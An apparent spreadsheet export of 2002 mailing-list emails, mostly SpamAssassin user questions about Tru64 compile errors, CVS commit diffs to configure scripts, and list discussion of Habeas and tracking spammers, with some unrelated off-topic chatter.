    <t>Hi, I'm trying to build SA under Digital Unix 4.0f and am receiving a\ncompile error (and many warnings) for spamc.  The "perl Makefile.PL"\ndoes OK, but when I do the make, I get this:\n\ncc -std -fprm d -ieee -D_INTRINSICS -I/usr/local/include -DLANGUAGE_C\n-O4 spamd\n/spamc.c  -o spamd/spamc -L/usr/local/lib -lbind -ldbm -ldb -lm -liconv\n-lutil\ncc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has\nno linkage and has a prior declaration in this scope at line number 592 in file\n/usr/include/sys/types.h. (nolinkage)\ntypedef unsigned long   in_addr_t;      /* base type for internet\naddress */\n------------------------^\ncc: Warning: spamd/spamc.c, line 169: In this statement, the referenced\ntype of\nthe pointer value "msg_buf" is "char", which is not compatible with\n"unsigned char". (ptrmismatch)\n  if((bytes = full_read (in, msg_buf, max_size+1024, max_size+1024)) &gt;\nmax_size)\n-----------------------------^\ncc: Warning: spamd/spamc.c, line 174: In this statement, the referenced\ntype of\nthe pointer value "header_buf" is "char", which is not compatible with\n"const unsigned char". (ptrmismatch)\n    full_write (out,header_buf,bytes2);\n--------------------^\ncc: Warning: spamd/spamc.c, line 202: In this statement, the referenced\ntype of\nthe pointer value "header_buf" is "char", which is not compatible with\n"const unsigned char". (ptrmismatch)\n    full_write (out,header_buf,bytes2);\n--------------------^\ncc: Warning: spamd/spamc.c, line 203: In this statement, the referenced\ntype of the pointer value "msg_buf" is "char", which is not compatible\nwith "const unsigned char". (ptrmismatch)\n    full_write (out,msg_buf,bytes);\n--------------------^\ncc: Warning: spamd/spamc.c, line 306: In this statement, the referenced\ntype of the pointer value "buf" is "char", which is not compatible with\n"unsigned char".\n (ptrmismatch)\n          if(full_read (in,buf,2,2) != 2 || !('\r' == buf[0] &amp;&amp; '\n' ==\nbuf[1]))\n---------------------------^\ncc: Warning: spamd/spamc.c, line 321: In this statement, the referenced\ntype of\nthe pointer value "buf" is "char", which is not compatible with\n"unsigned char".\n (ptrmismatch)\n    while((bytes=full_read (in,buf,8192, 8192)) &gt; 0)\n-------------------------------^\ncc: Warning: spamd/spamc.c, line 348: In this statement, the referenced\ntype of\nthe pointer value "out_buf" is "char", which is not compatible with\n"const unsigned char". (ptrmismatch)\n      full_write (out, out_buf, out_index);\n-----------------------^\ncc: Warning: spamd/spamc.c, line 497: In this statement, the referenced\ntype of\nthe pointer value "msg_buf" is "char", which is not compatible with\n"const unsigned char". (ptrmismatch)\n      full_write (STDOUT_FILENO,msg_buf,amount_read);\n--------------------------------^\ncc: Warning: spamd/spamc.c, line 512: In this statement, the referenced\ntype of\nthe pointer value "msg_buf" is "char", which is not compatible with\n"const unsigned char". (ptrmismatch)\n      full_write(STDOUT_FILENO,msg_buf,amount_read);\n-------------------------------^\n*** Exit 1\nStop.\n\nCan anyone suggest a way to get around this?   TIA...\n\nJim\n*-------------------------------------------------------------------------*\n* James H. McCullars                 I Phone: (256) 824-2610              *\n* Director of Systems &amp; Operations   I Fax:   (256) 824-6643              *\n* Computer &amp; Network Services        I Internet: mccullj@email.uah.edu    *\n* The University of Alabama          I -----------------------------------*\n*    in Huntsville                   I                                    *\n* Huntsville, AL 35899               I This space for rent - CHEAP!       *\n*-------------------------------------------------------------------------*\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talk@example.sourceforge.net\nFrom: "Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;\nDate: Wed, 28 Aug 2002 17:16:06 +0200</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 17:16:06 +0200</t>
  </si>
  <si>
    <t>"Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Too funny</t>
  </si>
  <si>
    <t>On Wednesday 28 August 2002 16:45 CET Steve Thomas wrote:\n&gt; | 0 hits here. :(\n&gt;\n&gt; I also get a lot of them. I think they're using the domain registry\n&gt; database to pull their victims' addresses.\n\nThey are crawling through the pages and send their "offers" to all addresses \nthey find. Theo won't every receive any offers as he doesn't publish his \naddress there ;-)\n\nMalte\n\n-- \n-- Coding is art.\n-- \n\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 Talk list &lt;Spamassassin-talk@example.sourceforge.net&gt;\nFrom: Don Newcomer &lt;newcomer@dickinson.edu&gt;\nDate: Wed, 28 Aug 2002 17:07:53 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 17:07:53 -0400 (EDT)</t>
  </si>
  <si>
    <t>Don Newcomer &lt;newcomer@dickinson.edu&gt;</t>
  </si>
  <si>
    <t>SpamAssassin Talk list &lt;Spamassassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Tru64 compile of SA</t>
  </si>
  <si>
    <t>I'm a new user (or about to be, hopefully) of SA but I've run into some\ncompilation errors that prevent me from installing.  Rather than picking\nthrough the code, I thought I'd avoid reinventing the wheel and ask here.\nWhen I run the 'make', I get the following:\n\ncc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has no\nlinka\nge and has a prior declaration in this scope at line number 572 in file\n/usr/inc\nlude/sys/types.h. (nolinkage)\ntypedef unsigned long   in_addr_t;      /* base type for internet address\n*/\n------------------------^\ncc: Warning: spamd/spamc.c, line 169: In this statement, the referenced\ntype of\nthe pointer value "msg_buf" is "char", which is not compatible with\n"unsigned ch\nar". (ptrmismatch)\n  if((bytes = full_read (in, msg_buf, max_size+1024, max_size+1024)) &gt;\nmax_size)\n-----------------------------^\ncc: Warning: spamd/spamc.c, line 174: In this statement, the referenced\ntype of\nthe pointer value "header_buf" is "char", which is not compatible with\n"const un\nsigned char". (ptrmismatch)\n    full_write (out,header_buf,bytes2);\n--------------------^\n\nThere are lots more where they came from.  Any ideas what can be done?\nThanks in advance.\n\n================================================================================\nDon Newcomer                                            Dickinson College\nAssociate Director, System and Network Services		P.O. Box 1773\nnewcomer@dickinson.edu                                  Carlisle, PA  17013\n                                                        Phone: (717) 245-1256\n                                                          FAX: (717) 245-1690\n\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talk@example.sourceforge.net\nFrom: Brian McNett &lt;bmcnett@radparker.com&gt;\nDate: Wed, 28 Aug 2002 17:05:49 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 17:05:49 -0700</t>
  </si>
  <si>
    <t>On Wednesday, August 28, 2002, at 01:50  PM, Robin Lynn Frank wrote:\n\n&gt; And if a spammer forges headers???\n\nHeader forgeries are trivially easy to detect. The main way that \nspammers hide their originating IPs is not by forging headers, \nbut by sending through open proxy servers.  It used to be that \nspammers used open relay mailserver, but these often betray the \noriginating IP, and the proliferation of open relay blocklists, \nand the introduction of port 25 blocking on the part of many \nISPs make open relays unattractive to spammers.\n\nOne would think, that the combination of a forged Habeas-SWE, \nand mail sent through an anonymizing open proxy would be a \nfairly good indication of spam.  Tracking a spammer to his \nmeatspace location is not as difficult as you might think, once \nyou have legal recourse to subpoena records.\n\n--B\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talk@example.sourceforge.net\nFrom: "Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;\nDate: Wed, 28 Aug 2002 16:47:22 +0200</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 16:47:22 +0200</t>
  </si>
  <si>
    <t>On Wednesday 28 August 2002 16:33 CET Theo Van Dinter wrote:\n&gt; On Wed, Aug 28, 2002 at 04:20:52PM +0200, Malte S. Stretz wrote:\n&gt; &gt; I get about 3 of these per week. A google for trafficmagnet convinces\n&gt; &gt; me that they're worth their own rule...\n&gt;\n&gt; 0 hits here. :(\n\nI recently cleaned my spam corpus from them but these are my current \nresults:\n   OVERALL        SPAM     NONSPAM  NAME\n     13929         995       12934  (all messages)\n        13          13           0  T_TRAFFICMAGNET\n\nI put it into cvs_rules_under_test, let's see what the 2.41 GA run thinks \nabout it :)\n\nMalte\n\n-- \n-- Coding is art.\n-- \n\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commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 28 Aug 2002 16:29:06 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 16:29:06 -0700</t>
  </si>
  <si>
    <t>Justin Mason &lt;yyyyason@users.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>spamassassin-commits@example.sourceforge.net</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin configure,1.1.2.1,1.1.2.2</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin In directory usw-pr-cvs1:/tmp/cvs-serv15398 Modified Files:       Tag: b2_4_0 	configure configure.in  Log Message: NetBSD support patch from Klaus Heinz, bug 785 Index: configure =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/configure,v retrieving revision 1.1.2.1 retrieving revision 1.1.2.2 diff -b -w -u -d -r1.1.2.1 -r1.1.2.2 --- configure	27 Aug 2002 23:07:13 -0000	1.1.2.1 +++ configure	28 Aug 2002 23:29:04 -0000	1.1.2.2 @@ -1273,18 +1273,22 @@                   cat &gt; conftest.$ac_ext &lt;  #include  +int main() { +printf ("%d", SHUT_RD); return 0; +; return 0; }  EOF -if (eval "$ac_cpp conftest.$ac_ext") 2&gt;&amp;5 | -  egrep "SHUT_RD" &gt;/dev/null 2&gt;&amp;1; then +if { (eval echo configure:1283: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then    rm -rf conftest*    shutrd=yes  else +  echo "configure: failed program was:" &gt;&amp;5 +  cat conftest.$ac_ext &gt;&amp;5    rm -rf conftest*    shutrd=no  fi -rm -f conftest* - +rm -f conftest*,           fi   @@ -1298,7 +1302,7 @@      echo $ac_n "checking for socket in -lsocket""... $ac_c" 1&gt;&amp;6 -echo "configure:1302: checking for socket in -lsocket" &gt;&amp;5 +echo "configure:1306: checking for socket in -lsocket" &gt;&amp;5  ac_lib_var=`echo socket'_'socket | sed 'y%./+-%__p_%'`  if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6 @@ -1306,7 +1310,7 @@    ac_save_LIBS="$LIBS"  LIBS="-lsocket  $LIBS"  cat &gt; conftest.$ac_ext &lt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then +if { (eval echo configure:1325: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then    rm -rf conftest*    eval "ac_cv_lib_$ac_lib_var=yes"  else @@ -1345,7 +1349,7 @@  fi    echo $ac_n "checking for connect in -linet""... $ac_c" 1&gt;&amp;6 -echo "configure:1349: checking for connect in -linet" &gt;&amp;5 +echo "configure:1353: checking for connect in -linet" &gt;&amp;5  ac_lib_var=`echo inet'_'connect | sed 'y%./+-%__p_%'`  if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6 @@ -1353,7 +1357,7 @@    ac_save_LIBS="$LIBS"  LIBS="-linet  $LIBS"  cat &gt; conftest.$ac_ext &lt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then +if { (eval echo configure:1372: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then    rm -rf conftest*    eval "ac_cv_lib_$ac_lib_var=yes"  else @@ -1392,7 +1396,7 @@  fi    echo $ac_n "checking for t_accept in -lnsl""... $ac_c" 1&gt;&amp;6 -echo "configure:1396: checking for t_accept in -lnsl" &gt;&amp;5 +echo "configure:1400: checking for t_accept in -lnsl" &gt;&amp;5  ac_lib_var=`echo nsl'_'t_accept | sed 'y%./+-%__p_%'`  if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6 @@ -1400,7 +1404,7 @@    ac_save_LIBS="$LIBS"  LIBS="-lnsl  $LIBS"  cat &gt; conftest.$ac_ext &lt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then +if { (eval echo configure:1419: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then    rm -rf conftest*    eval "ac_cv_lib_$ac_lib_var=yes"  else @@ -1439,7 +1443,7 @@  fi    echo $ac_n "checking for dlopen in -ldl""... $ac_c" 1&gt;&amp;6 -echo "configure:1443: checking for dlopen in -ldl" &gt;&amp;5 +echo "configure:1447: checking for dlopen in -ldl" &gt;&amp;5  ac_lib_var=`echo dl'_'dlopen | sed 'y%./+-%__p_%'`  if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6 @@ -1447,7 +1451,7 @@    ac_save_LIBS="$LIBS"  LIBS="-ldl  $LIBS"  cat &gt; conftest.$ac_ext &lt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then +if { (eval echo configure:1466: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then    rm -rf conftest*    eval "ac_cv_lib_$ac_lib_var=yes"  else @@ -1489,12 +1493,12 @@  for ac_func in socket strdup strtod strtol snprintf shutdown  do  echo $ac_n "checking for $ac_func""... $ac_c" 1&gt;&amp;6 -echo "configure:1493: checking for $ac_func" &gt;&amp;5 +echo "configure:1497: checking for $ac_func" &gt;&amp;5  if eval "test \"`echo '$''{'ac_cv_func_$ac_func'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6  else    cat &gt; conftest.$ac_ext &lt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then +if { (eval echo configure:1525: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then    rm -rf conftest*    eval "ac_cv_func_$ac_func=yes"  else @@ -1544,20 +1548,20 @@      echo $ac_n "checking for h_errno""... $ac_c" 1&gt;&amp;6 -echo "configure:1548: checking for h_errno" &gt;&amp;5 +echo "configure:1552: checking for h_errno" &gt;&amp;5  if eval "test \"`echo '$''{'herrno'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6  else                      cat &gt; conftest.$ac_ext &lt;  int main() {  printf ("%d", h_errno); return 0;  ; return 0; }  EOF -if { (eval echo configure:1561: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then +if { (eval echo configure:1565: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then    rm -rf conftest*    herrno=yes  else @@ -1580,20 +1584,20 @@      echo $ac_n "checking for optarg""... $ac_c" 1&gt;&amp;6 -echo "configure:1584: checking for optarg" &gt;&amp;5 +echo "configure:1588: checking for optarg" &gt;&amp;5  if eval "test \"`echo '$''{'haveoptarg'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6  else                      cat &gt; conftest.$ac_ext &lt;  int main() {  if (optarg == (char *) 0L) { return 0; } return 1;  ; return 0; }  EOF -if { (eval echo configure:1597: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then +if { (eval echo configure:1601: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then    rm -rf conftest*    haveoptarg=yes  else @@ -1616,20 +1620,21 @@      echo $ac_n "checking for in_addr_t""... $ac_c" 1&gt;&amp;6 -echo "configure:1620: checking for in_addr_t" &gt;&amp;5 +echo "configure:1624: checking for in_addr_t" &gt;&amp;5  if eval "test \"`echo '$''{'inaddrt'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6  else                      cat &gt; conftest.$ac_ext &lt;  #include   int main() {  in_addr_t foo; return 0;  ; return 0; }  EOF -if { (eval echo configure:1633: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then +if { (eval echo configure:1638: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then    rm -rf conftest*    inaddrt=yes  else @@ -1645,12 +1650,12 @@  echo "$ac_t""$inaddrt" 1&gt;&amp;6  if test $inaddrt = no ; then    echo $ac_n "checking for in_addr_t""... $ac_c" 1&gt;&amp;6 -echo "configure:1649: checking for in_addr_t" &gt;&amp;5 +echo "configure:1654: checking for in_addr_t" &gt;&amp;5  if eval "test \"`echo '$''{'ac_cv_type_in_addr_t'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6  else    cat &gt; conftest.$ac_ext &lt;  #if STDC_HEADERS @@ -1681,20 +1686,21 @@      echo $ac_n "checking for INADDR_NONE""... $ac_c" 1&gt;&amp;6 -echo "configure:1685: checking for INADDR_NONE" &gt;&amp;5 +echo "configure:1690: checking for INADDR_NONE" &gt;&amp;5  if eval "test \"`echo '$''{'haveinaddrnone'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6  else                      cat &gt; conftest.$ac_ext &lt;  #include   int main() {  in_addr_t foo = INADDR_NONE; return 0;  ; return 0; }  EOF -if { (eval echo configure:1698: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then +if { (eval echo configure:1704: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then    rm -rf conftest*    haveinaddrnone=yes  else @@ -1717,20 +1723,23 @@      echo $ac_n "checking for EX__MAX""... $ac_c" 1&gt;&amp;6 -echo "configure:1721: checking for EX__MAX" &gt;&amp;5 +echo "configure:1727: checking for EX__MAX" &gt;&amp;5  if eval "test \"`echo '$''{'haveexmax'+set}'`\" = set"; then    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6  else                      cat &gt; conftest.$ac_ext &lt; +#endif  #include   int main() {  int foo = EX__MAX; return 0;  ; return 0; }  EOF -if { (eval echo configure:1734: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then +if { (eval echo configure:1743: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then    rm -rf conftest*    haveexmax=yes  else Index: configure.in =================================================================== RCS file: /cvsroot/spamassassin/spamassassin/configure.in,v retrieving revision 1.1.2.1 retrieving revision 1.1.2.2 diff -b -w -u -d -r1.1.2.1 -r1.1.2.2 --- configure.in	27 Aug 2002 23:07:13 -0000	1.1.2.1 +++ configure.in	28 Aug 2002 23:29:04 -0000	1.1.2.2 @@ -26,9 +26,11 @@    AC_CACHE_CHECK([for SHUT_RD],         shutrd, [ -                 AC_EGREP_HEADER(SHUT_RD, sys/socket.h, +                AC_TRY_COMPILE([#include  +#include ], +                        [printf ("%d", SHUT_RD); return 0;],                                          [shutrd=yes], -                                        [shutrd=no]) +                                        [shutrd=no]),         ])  if test $shutrd = yes ; then    AC_DEFINE(HAVE_SHUT_RD) @@ -73,7 +75,8 @@    AC_CACHE_CHECK([for in_addr_t],          inaddrt, [ -                AC_TRY_COMPILE([#include ], +                AC_TRY_COMPILE([#include  +#include ],                          [in_addr_t foo; return 0;],                                          [inaddrt=yes],                                          [inaddrt=no]), @@ -86,7 +89,8 @@    AC_CACHE_CHECK([for INADDR_NONE],          haveinaddrnone, [ -                AC_TRY_COMPILE([#include ], +                AC_TRY_COMPILE([#include  +#include ],                          [in_addr_t foo = INADDR_NONE; return 0;],                                          [haveinaddrnone=yes],                                          [haveinaddrnone=no]), @@ -99,7 +103,10 @@    AC_CACHE_CHECK([for EX__MAX],          haveexmax, [ -                AC_TRY_COMPILE([#include ], +                AC_TRY_COMPILE([#ifdef HAVE_SYSEXITS_H +#include  +#endif +#include ],                          [int foo = EX__MAX; return 0;],                                          [haveexmax=yes],                                          [haveexmax=no]), ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Spamassassin-commits mailing list Spamassassin-commits@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Russell Turpin" &lt;deafbox@hotmail.com&gt;\nDate: Wed, 28 Aug 2002 16:26:34 +0000</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 16:26:34 +0000</t>
  </si>
  <si>
    <t>"Russell Turpin" &lt;deafbox@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Re: Canadians</t>
  </si>
  <si>
    <t>Gary Lawrence Murphy:\n&gt;If we had more variety of franchise food than\n&gt;the Wendys/KFC/PizzaHut/TacoBell/TimHorton's monopoly .. The USA is a \n&gt;nation founded on creative free enterprise entrepreneurs; Canada\n&gt;is a nation built on monopolies.\n\nThings aren't all that bad. I remember Vancouver\nas having a broad variety of good, local eateries.\nAnd Toronto as having a variety of good, local\nstrip joints. ;-) I never ate a doughnut in\nCanada, so I cannot vouch for their quality. I\ncould live in either of these cities quite happily,\nbut Carolyn doesn't like cold weather.\n\nPersonally, I almost never eat at a franchise\nrestaurant. Usually you can find better fare or\ncheaper fare (and often both!) at a local\nrestaurant.\n\n\n\n_________________________________________________________________\nJoin the worlds largest e-mail service with MSN Hotmail. \n[URL]http://www.hotmail.com[/URL]</t>
  </si>
  <si>
    <t>http://www.hotmail.com</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: "Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;\nDate: Wed, 28 Aug 2002 16:15:18 +0200</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 16:15:18 +0200</t>
  </si>
  <si>
    <t>Re: [SAtalk] test</t>
  </si>
  <si>
    <t>On Tuesday 27 August 2002 19:26 CET Leroy B. wrote:\n&gt; Ignore...\n\nCan't.\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talk@example.sourceforge.net\nFrom: Bart Schaefer &lt;schaefer@zanshin.com&gt;\nDate: Wed, 28 Aug 2002 16:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 16:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Bart Schaefer &lt;schaefer@zanshin.com&gt;</t>
  </si>
  <si>
    <t>On Wed, 28 Aug 2002, Matthew Cline wrote:\n\n&gt; There must be *some* way of tracking a spammer down, since they are\n&gt; planning on making money from the spam.\n\nMany spammers make money not from response to the spam, but from selling\nthe service of spamming on behalf of someone else.  You might track down\nwhoever paid for the mailing, but tracking down the actual sender might be\nmore difficult, and even if they manage to recover damages from the buyer\nthey haven't stopped the spammer, so the benefit is strictly to Habeas,\nnot to the recipients of the spam.  That's the main problem I have with\nthe whole scenario: My pain, Habeas's gain, and those most likely to be\nheld liable are those least likely to be the really serious abusers.\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Brent Welch &lt;welch@panasas.com&gt;,\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Wed, 28 Aug 2002 15:50:55 +0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 15:50:55 +0700</t>
  </si>
  <si>
    <t>Brent Welch &lt;welch@panasas.com&gt;,</t>
  </si>
  <si>
    <t>Re: Anolther sequence related traceback</t>
  </si>
  <si>
    <t>Date:        Wed, 28 Aug 2002 13:51:21 +0700     From:        Robert Elz      Message-ID:  &lt;18366.1030517481@munnari.OZ.AU&gt;   | But, while I was playing there, I noticed something I never new before. I also no the difference between new &amp; knew, but I don't always type well... Um, I mean, I know the difference... kre _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Matthew Cline &lt;matt@nightrealms.com&gt;\nDate: Wed, 28 Aug 2002 15:48:21 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 15:48:21 -0700</t>
  </si>
  <si>
    <t>On Wednesday 28 August 2002 01:50 pm, Robin Lynn Frank wrote:\n\n&gt; On Wednesday 28 August 2002 01:34 pm, Brian McNett wrote:\n&gt; &gt; Also, that little haiku is a copyrighted work, so not only CAN\n&gt; &gt; Habeas sue, they MUST sue to protect their copyright. And since\n&gt; &gt; it's a trademark as well, that's a double-whammy. Habeas has\n&gt; &gt; some pretty high-powered legal people, who will gladly go to\n&gt; &gt; town on violators.\n\n&gt; &gt; The whole point here is to give them the legal leverage they\n&gt; &gt; need to put spammers out of business, and not only block mail\n&gt; &gt; from them, but allow through the things that really AREN'T spam.\n\n&gt; And if a spammer forges headers???\n\nThere must be *some* way of tracking a spammer down, since they are planning \non making money from the spam.  What a court would consider evidence of being \nthe spammer is another question.\n\n-- \nGive a man a match, and he'll be warm for a minute, but set him on\nfire, and he'll be warm for the rest of his life.\n\nICQ: 132152059 | Advanced SPAM filtering software: [URL]http://spamassassin.org[/URL]\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commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 28 Aug 2002 15:46:30 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 15:46:30 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/t SATest.pm,1.15.4.1,1.15.4.2</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/t\nIn directory usw-pr-cvs1:/tmp/cvs-serv3992/t\n\nModified Files:\n      Tag: b2_4_0\n	SATest.pm \nLog Message:\nok, looks like SA can now be run even with another version installed in /usr, again\n\nIndex: SATest.pm\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/t/SATest.pm,v\nretrieving revision 1.15.4.1\nretrieving revision 1.15.4.2\ndiff -b -w -u -d -r1.15.4.1 -r1.15.4.2\n--- SATest.pm	27 Aug 2002 21:44:14 -0000	1.15.4.1\n+++ SATest.pm	28 Aug 2002 22:46:28 -0000	1.15.4.2\n@@ -15,7 +15,7 @@\n   my $tname = shift;\n \n   $scr = $ENV{'SCRIPT'};\n-  $scr ||= "../spamassassin";\n+  $scr ||= "perl -w ../spamassassin";\n \n   $spamd = $ENV{'SPAMD_SCRIPT'};\n   $spamd ||= "../spamd/spamd -x";\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: Justin Mason &lt;yyyyason@users.sourceforge.net&gt;\nDate: Wed, 28 Aug 2002 15:08:37 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 15:08:37 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/masses parse-rules-for-masses,1.1.2.2,1.1.2.3</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/masses\nIn directory usw-pr-cvs1:/tmp/cvs-serv24879\n\nModified Files:\n      Tag: b2_4_0\n	parse-rules-for-masses \nLog Message:\nfix for bug 784\n\nIndex: parse-rules-for-masses\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/masses/parse-rules-for-masses,v\nretrieving revision 1.1.2.2\nretrieving revision 1.1.2.3\ndiff -b -w -u -d -r1.1.2.2 -r1.1.2.3\n--- parse-rules-for-masses	28 Aug 2002 13:49:51 -0000	1.1.2.2\n+++ parse-rules-for-masses	28 Aug 2002 22:08:35 -0000	1.1.2.3\n@@ -28,6 +28,7 @@\n \n if (!defined $outputfile) {\n   $outputfile = "./tmp/rules.pl";\n+  mkdir ("tmp", 0755);\n }\n \n my $rules = { };\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Michael Clark &lt;mclark@cdtmail.org&gt;\nDate: Wed, 28 Aug 2002 14:57:39 -0400</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 14:57:39 -0400</t>
  </si>
  <si>
    <t>Michael Clark &lt;mclark@cdtmail.org&gt;</t>
  </si>
  <si>
    <t>[SAtalk] updating SA</t>
  </si>
  <si>
    <t>To update spamassasin, all I need to do is install the new tar.gz \nfile as if it were a new installation? I don't need to stop incoming \nmail or anything like that? Thanks, Mike\n\n\n-- \nMichael Clark, Webmaster\nCenter for Democracy and Technology\n1634 Eye Street NW, Suite 1100\nWashington, DC 20006\nvoice: 202-637-9800\n[URL]http://www.cdt.org[/URL]\n\nJoin our Activist Network! Your participation can make a difference!\n[URL]http://www.cdt.org[/URL]\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http://www.cdt.org http://www.cdt.org http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: &lt;SpamAssassin-devel@example.sourceforge.net&gt;,\nFrom: "rODbegbie" &lt;rOD@arsecandle.org&gt;\nDate: Wed, 28 Aug 2002 14:55:43 -0400</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 14:55:43 -0400</t>
  </si>
  <si>
    <t>"rODbegbie" &lt;rOD@arsecandle.org&gt;</t>
  </si>
  <si>
    <t>&lt;SpamAssassin-devel@example.sourceforge.net&gt;,</t>
  </si>
  <si>
